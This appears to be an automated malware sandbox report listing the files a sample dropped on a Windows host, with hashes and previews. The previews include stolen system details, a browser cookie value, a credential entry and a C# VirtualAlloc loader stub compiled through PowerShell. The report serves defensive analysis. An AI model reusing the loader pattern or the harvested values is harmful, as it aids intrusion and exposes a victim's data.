                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):11606
                                                        Entropy (8bit):4.8910535897909355
                                                        Encrypted:false
                                                        SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                                                        MD5:F84F6C99316F038F964F3A6DB900038F
                                                        SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                                                        SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                                                        SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                                                        Malicious:false
                                                        Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1192
                                                        Entropy (8bit):5.325275554903011
                                                        Encrypted:false
                                                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                                        MD5:05CF074042A017A42C1877FC5DB819AB
                                                        SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                                        SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                                        SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                                        Malicious:false
                                                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                        C:\Users\user\AppData\Local\Temp\1E0C.bi1

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):120
                                                        Entropy (8bit):4.524106603776786
                                                        Encrypted:false
                                                        SSDEEP:3:cPaRhARtt7TSjjhThARtuV/gR01I1/v:oMWbtChWb0gR1/v
                                                        MD5:DF83C2808C7F54E162CE6A66507FBBBE
                                                        SHA1:B8E6CA152AFA7142F928BEF5849C4C54708138C8
                                                        SHA-256:23EB89272AD3DA25605683EA7B3691FA5F76508B19870F023AD55E9FAEE8D1B8
                                                        SHA-512:078BCF94F0EC71037319D9E90A0F60BE335BECFBBC6C60CB05FA5CBF3C3187245E7C9270E8A7F8C90DB8D2391D20DD6A7726EA60B8921ADC1B67144CC19CD233
                                                        Malicious:false
                                                        Preview:Server: dns.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 102.129.143.40....-------- ..

                                                        C:\Users\user\AppData\Local\Temp\2E09.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):51527
                                                        Entropy (8bit):4.037117443902078
                                                        Encrypted:false
                                                        SSDEEP:1536:WMo5mDUI+p0C7fZtPWS2/4CXW+kmwjlC4xuLGdv/ltLDH6i2GawcWGuwZtuKbuYF:WMgB9QD
                                                        MD5:C7A2F628DCF3F85CE0F22072367AB241
                                                        SHA1:B271D32EA3E80C7032905E77C8CFB204D4586646
                                                        SHA-256:617784E5DC452EF14C733D51EF3C1C78FF227BDE7FBC0EF185518405D0A74744
                                                        SHA-512:73D9D8445C72B49F7AFD38E5E3F58A26A3FFBA258F8B27A8387729978E0446F92F1FADC10409E3248714B97B8904F1C7D509C06E223897A4AE709CD3286ED772
                                                        Malicious:false
                                                        Preview:..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 3:49:21 PM..System Boot Time: 2/26/2022, 10:41:46 AM..System Manufacturer: 9KPUUrhOTYlp6ub..System Model: lfvCW2wz..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 9LT2K L88M8, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:

                                                        C:\Users\user\AppData\Local\Temp\2E09.bin1

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2192
                                                        Entropy (8bit):4.508807162396169
                                                        Encrypted:false
                                                        SSDEEP:48:LjmD3CNY2+3JxGK/JIjW37Xi7ZkgTMyErcCGuJUbCFRZC:LjmDyu2uHEN2ad+USy
                                                        MD5:283BF832B79AAEB537B565120932F2A5
                                                        SHA1:B54B0319174E531BB29691F54DEB21A27923EBFF
                                                        SHA-256:FD249DEFC2ED59284514EB5E6422E241B23C964C1C0F5B20A1082A866939CD5B
                                                        SHA-512:9C73F3DECB76FEEBE10CF72A744FFD5F115BF30FEA811056927A6DCB7D6412A31ED22764814F9B1F79B7FAA9127B00B421F89E345EF11E4483C3E2875E9ED3D6
                                                        Malicious:false
                                                        Preview:..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 3:49:21 PM..System Boot Time: 2/26/2022, 10:41:46 AM..System Manufacturer: 9KPUUrhOTYlp6ub..System Model: lfvCW2wz..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 9LT2K L88M8, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:

                                                        C:\Users\user\AppData\Local\Temp\84C2.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:dropped
                                                        Size (bytes):228
                                                        Entropy (8bit):5.658648125232449
                                                        Encrypted:false
                                                        SSDEEP:3:vhjnl/lk/Pty7doMLz+iFmoATVffEjxdHIcX6HXIlfzUU2v9qInll1/lk/Pty/lb:5jttz+mmRVXYxdocX2Il6nlzkOVl+lIn
                                                        MD5:FDFBDE5D49536CED9C27DB86286777E2
                                                        SHA1:0D2786D903F7F23EA42737469CCE0B692FEFE216
                                                        SHA-256:28D47152041EFA538E81BD143B621254D43ABAE88B5B0B3E917B266698633AB1
                                                        SHA-512:028650BB005585508CAD066C56C1B298984F9820F7E8689AD9F715C790C34EA40C48225C1D478B2A1942C1266420FBC11CACE4C1C9991B0AFE5142A376EB0325
                                                        Malicious:false
                                                        Preview:PK............@...t...........D8E.bin..1..@...@...,$e`..).....v.r.=vWC~.....f.....Y..3Cu.G.Lcd..qY ......b2.#.Y..;.......k..}c.XO.I..}v.9?.Hh..%.^.PK..............@...t.........................D8E.binPK..........5.........

                                                        C:\Users\user\AppData\Local\Temp\90BF.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:dropped
                                                        Size (bytes):412
                                                        Entropy (8bit):6.836864258334393
                                                        Encrypted:false
                                                        SSDEEP:12:5jxf4sSBMtothqUWWWUXbeuj29Trx/f5Yajtn:9xf4sSBCqAWWnTpfJtn
                                                        MD5:49B7CE4DF08EEAA8EF83CBD75C92B206
                                                        SHA1:B821F695DA61B19831C426030128FE752FBEB158
                                                        SHA-256:DB4726A19EB763CD9C9C93A28E3A9F621DBFA19813B4A5141D54952DB3A7C659
                                                        SHA-512:5A6BC3BE9652FAC414C510E285318AD513969DD470588569A84A1A12E247E02BC28A8441AD49DB9B535EE76BA86ABE07E85E5863F103858F215EB8EA1E3AC1A5
                                                        Malicious:false
                                                        Preview:PK............X4..,...z.......C9B.bin=.]o.0...K.....Iv..:D.3..T.J[.Vq......O....h.\... \.......`.r....EE.G.4&]M.,..!....m .6...J..%...}.UK4.....Q:s...(.M5...Ozl5..G..1...UC....>._.J.H.....J=\.>....36....,*;kU.~FKo.B|/ph.3..h.c..A......*4...9T.._\ys..4_...3._$=!..{.../w.IbB..o.=R...dY..7kN.?q.(Mn|.jE....;.c.o}zQ.e.._.PK..............X4..,...z.....................C9B.binPK..........5...Q.....

                                                        C:\Users\user\AppData\Local\Temp\A717.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:modified
                                                        Size (bytes):9373
                                                        Entropy (8bit):7.969688687051471
                                                        Encrypted:false
                                                        SSDEEP:192:zOYOv4MyLGQcHMHrVF6xsxIAQib5UwMA2Gp5XJe5r:Uv4rUHgrj6sSAlLRrXJex
                                                        MD5:DC2925093A6793DB90E71F34D0DA9D51
                                                        SHA1:B50166DDC6DDCAFF7644C37EEF03DC71B3BB22A7
                                                        SHA-256:514D4B65B3BCB2059C0D908963FB7CF8A9BE3C9BA0D575462186E01B51DE03F8
                                                        SHA-512:161691FCEDCAEAF6A3E834F78645E3E09A7D1DB69FC78FB49DB2DB38999A5554BB12EC664CC0F65C8A5B2A3BE8879502DA6C4229681BB616C4E3A8CEE81D7ADA
                                                        Malicious:false
                                                        Preview:PK..............}-$..G.......E09.bin.}{s.....|....l......%J.6..#.v.R..I..u...;5....)K2.0g.9.....D..h4.......e.....a..O./....z.~_z...<. .];..p...n..O. .........7.^...3.L.K.*\.k.(s=G 4i6..lm.i.....w..8.c+.p.b..kw..wjM.......$..c.VM.._..n.3/u.8.Q...0..z.n.6n...9..S..*./E..L.....%7..D..N...J...(".Z..: mQ.h..d.L....,O......:|.m.;...(.?..:..%.....0...0L....0.\.F.,..._.......!........f.w/.e....A.^7..n|/?..|.`..vVV..2.D$T....{OJB....9{.N8..?.../...y=U.Z...=.0.2.(r....>. s.D....,...|..fG.vx....W..|......s.P{.....K.n|..Z...S.....".'x.u.s.Wb|.o?\Z....].e>....m..k..N...$.xn..>..n.....t...w. ....j..L.7.`......o.t!.....S..O..........G..........(.,..a..c.....0G~)5....l.....\.Zy....'I.....8.j..g.t..9.~....J....^wp.Y .&....rdX.$L]..K...R.a.#.t....@............d....p.....]..b-xxe./.t.>..N..3...5J....cP...$.z6....a.Q...z%|v7..e...0.@....zU...$...Tdh._..a...sH..C.V3C..'.C.(..h...|&..g...F.6k4./..v_..(..b-v..=.)0l`*...@...<.(H.|l..`.`..B..0yNQ...<.F.s].W.B

                                                        C:\Users\user\AppData\Local\Temp\CC9B.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):378
                                                        Entropy (8bit):5.599881960561245
                                                        Encrypted:false
                                                        SSDEEP:6:YM6jkk4RTML/pU98M7ETSHp926Sfp2LiGhFEbhTqKxUNHdHZ2HmwhZZZHwFnAVN:YJkk4RoL/p4vE6UxfELiKwsb9HZ2pHRL
                                                        MD5:4CFD7AAC201D285D1EB218F0043BB0E8
                                                        SHA1:37A3071C28DCB2D07F0FFFB4AB00863A3A396C03
                                                        SHA-256:ED0EFDBE241441D7C0A2C23B612916F757E935F5970EC2BAE86744F659D01E75
                                                        SHA-512:80FAF7B9B4E3A749F186F4E9E5E0F230EE20ED95CAA028621B262D86F69470BCC66BC19E5FD81E5C70DF7042C1F6C7FE81EBE4521F24E018F74B859CD02C79CC
                                                        Malicious:false
                                                        Preview:{"id":0,"agent":"CR","domain":".google.com","expirationDate":1617262195,"hostOnly":false,"httpOnly":true,"name":"NID","path":"/","sameSite":"false","secure":true,"session":false,"storeId":"0","value":"204=TAJoBZJmGymg7hmIhx3Pl2B_ihALX0aygaD3k_6aC7ZxEK7XXCNSCdw1ngcPD2GKb8blK9BMvnrjIC7LQudAB_6nqtij7uM-AmmmXBhTbFN20087xdr3Z7uOpVj33C0KRQne2C-F8m9XNwnFH3I5zkA8uxAkwvE0BSBiqum7_78"}

                                                        C:\Users\user\AppData\Local\Temp\ED8E.bin

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):176
                                                        Entropy (8bit):4.832266387295497
                                                        Encrypted:false
                                                        SSDEEP:3:1D3YJkcidTWXH+CDcNY7gwWASAcX4CDcNY7gwWARKaJFvVoXxOkcidcWSKXBFvn:uJkcilWXeCQNY7gZASAbCQNY7gZAdJFm
                                                        MD5:7F4BAB53E86D1F77B9A69B4BEC3ED22A
                                                        SHA1:66D613BD2DCD6743C4185C09BFD1CA40B0964C88
                                                        SHA-256:F5CE776775D9EBFBEA69837550D59204A8521B9553EB243656A7B12FF5D57D11
                                                        SHA-512:0139A01E0170D7CFBE3BDA0D8307D49DAB442976A5E61F02993B139BF53C23639F162FF8B5842792FE76812CD798B649F567BECDA88699523688A4C3A34C39A3
                                                        Malicious:false
                                                        Preview:type=ED, name=02mhakedhkeskfde, address=MicrosoftAccount:target=SSO_POP_Device, server=MicrosoftAccount:target=SSO_POP_Device, port=0, ssl=0, user=02mhakedhkeskfde, password=..

                                                        C:\Users\user\AppData\Local\Temp\RES3A11.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.9888712937502846
                                                        Encrypted:false
                                                        SSDEEP:24:H1e9E2+fPtDfHFuQhKdNWI+ycuZhNH3akSUgPNnq9qd:XJlzKd41ulH3a3U4q9K
                                                        MD5:891E8CF61EBFAA4D51E0B4A09BFC9262
                                                        SHA1:930D5FC6BE5A83C6B643D811DD307FDF0494C706
                                                        SHA-256:814C5C14ADFEB94477037E31E2F9BD44F0D161B8A4948F2B511F64C0A58DAFBF
                                                        SHA-512:3FCDF82BAF065AD24CEB7C66017A50E92A76F110AD2A682F5DC56ADE73735B87EB105956AAF4D2FA5123621A234993E90D8A7739874861399FC8AF1E43F06156
                                                        Malicious:false
                                                        Preview:L...~.rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP...............Hr;(.wSRz2..2,..........4.......C:\Users\user\AppData\Local\Temp\RES3A11.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                        C:\Users\user\AppData\Local\Temp\RES5431.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.984342590329363
                                                        Encrypted:false
                                                        SSDEEP:24:Hfe9E2+f6S5DfH0hKdNWI+ycuZhN6akSyPNnq9qd:Bv9mKd41ul6a3eq9K
                                                        MD5:DBC97AAABA8982682A073E1F6DC665C1
                                                        SHA1:536B1F147A18FF1467E49FD670E4F79F8466B371
                                                        SHA-256:944E5CB56A02CD6CD0773F1FBAF4F3D598AA0227DFB6169B59608EFC9DE5D98D
                                                        SHA-512:70829F56521DC9C98776F4D35D8FDD0E525EBF13DF9C18A33E3946BF7084A20A797C24E2B49E58271142EC10A6E756D839B999EABAE96810035323AF30930EC4
                                                        Malicious:false
                                                        Preview:L.....rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP...............D*{_sd.p.:.bW............4.......C:\Users\user\AppData\Local\Temp\RES5431.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jnnrb2c.xpe.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eix4r5e5.krv.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.1131838152508884
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8ak7YnqqyPN5Dlq5J:+RI+ycuZhN6akSyPNnqX
                                                        MD5:442A7B5F7364FA70EE8E3AD06257EF01
                                                        SHA1:EB70DAFCE9B42DDE723E87C1D4E0FB00C92EB40A
                                                        SHA-256:19A46984BFBCA971C3C72A4473E74D5FFCBEF75024382D9B09EDFC8FEA028C7F
                                                        SHA-512:98E5329A3692507E6A18741175846B6D6A76F58A24073025759CE20C0E9DFE0316774E5B51C513D8C02EC840664594EEF8A6A851EBF20DDF8AE9813D1EAD14F2
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text
                                                        Category:dropped
                                                        Size (bytes):392
                                                        Entropy (8bit):4.988829579018284
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                                                        MD5:80545CB568082AB66554E902D9291782
                                                        SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                                                        SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                                                        SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.26479255454489
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fXus0zxs7+AEszIwkn23fXuy:p37Lvkmb6KRffu3WZEiffuy
                                                        MD5:3A3B00B94E0B79EF22728B1A7FE98FA8
                                                        SHA1:3B07F3391A6398D4307CBB156E78908A3FD144CB
                                                        SHA-256:59645E418E08488C8010F2CEA8259963463A9EDD80D56B3EEC36D4F83941CCEC
                                                        SHA-512:FFB6E269A9E6D3CD155AE246FA6115B3AD16AA6C58A09B6480F7A9E457DED43B39D7511B5A70179ED58BE9AB8FFD7D0C0E1D88F7FFE04EC508594D3AAD46E34D
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs"

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3584
                                                        Entropy (8bit):2.597367616720797
                                                        Encrypted:false
                                                        SSDEEP:24:etGSs/u2Bg85z7xlfwZD6egdWqtkZf+YP38FWI+ycuZhN6akSyPNnq:61Yb5hFCD6fWdJ+Yv8Q1ul6a3eq
                                                        MD5:05D321F29278AB204135CE4318DA43DE
                                                        SHA1:BF2BA1B03308E4DC8F4752E8AC20D6F3A5E555A0
                                                        SHA-256:1ED702400166E5CF4B6633A7E27A2A280EBA2106926AFE247739D768E99DAD9C
                                                        SHA-512:EDB677275B5DB2205FA3DAAE5C428CC018CC7BC77A2A2C16533F83F2829308B64DAE8F4F160DBFFA997127DDF4FA63C8A6F885556CF0EC4AD9D41469B2896CB4
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                                                        C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.out

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.342582156847717
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KRffukEiffurKaM5DqBVKVrdFAMBJTH:Akka6CREuIKxDcVKdBJj
                                                        MD5:2E43C2C9F10216D05447C47E401EA080
                                                        SHA1:4406C4A0FBA4CD769CDCB4A91ACF931E527E88D8
                                                        SHA-256:27EC3B2FFC4EA97ADC031A783C8F9C1232F73CACD297C77581575F84253C46A7
                                                        SHA-512:ECB81C0381F69948C2B53E408BBE6E9AE92EC81524213F51CD5FCE06F89E1E12806E62377ECBD5428CC0A50BACF666BB832488C4B7EE42EF9637A429AFBEF370
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                        C:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.119272920863618
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grylWOak7YnqqUWPPN5Dlq5J:+RI+ycuZhNH3akSUgPNnqX
                                                        MD5:48723B28EEA47753527A32A9E3B1322C
                                                        SHA1:E7CD0D5366F4F0B7010764B7E903363858FCDAA7
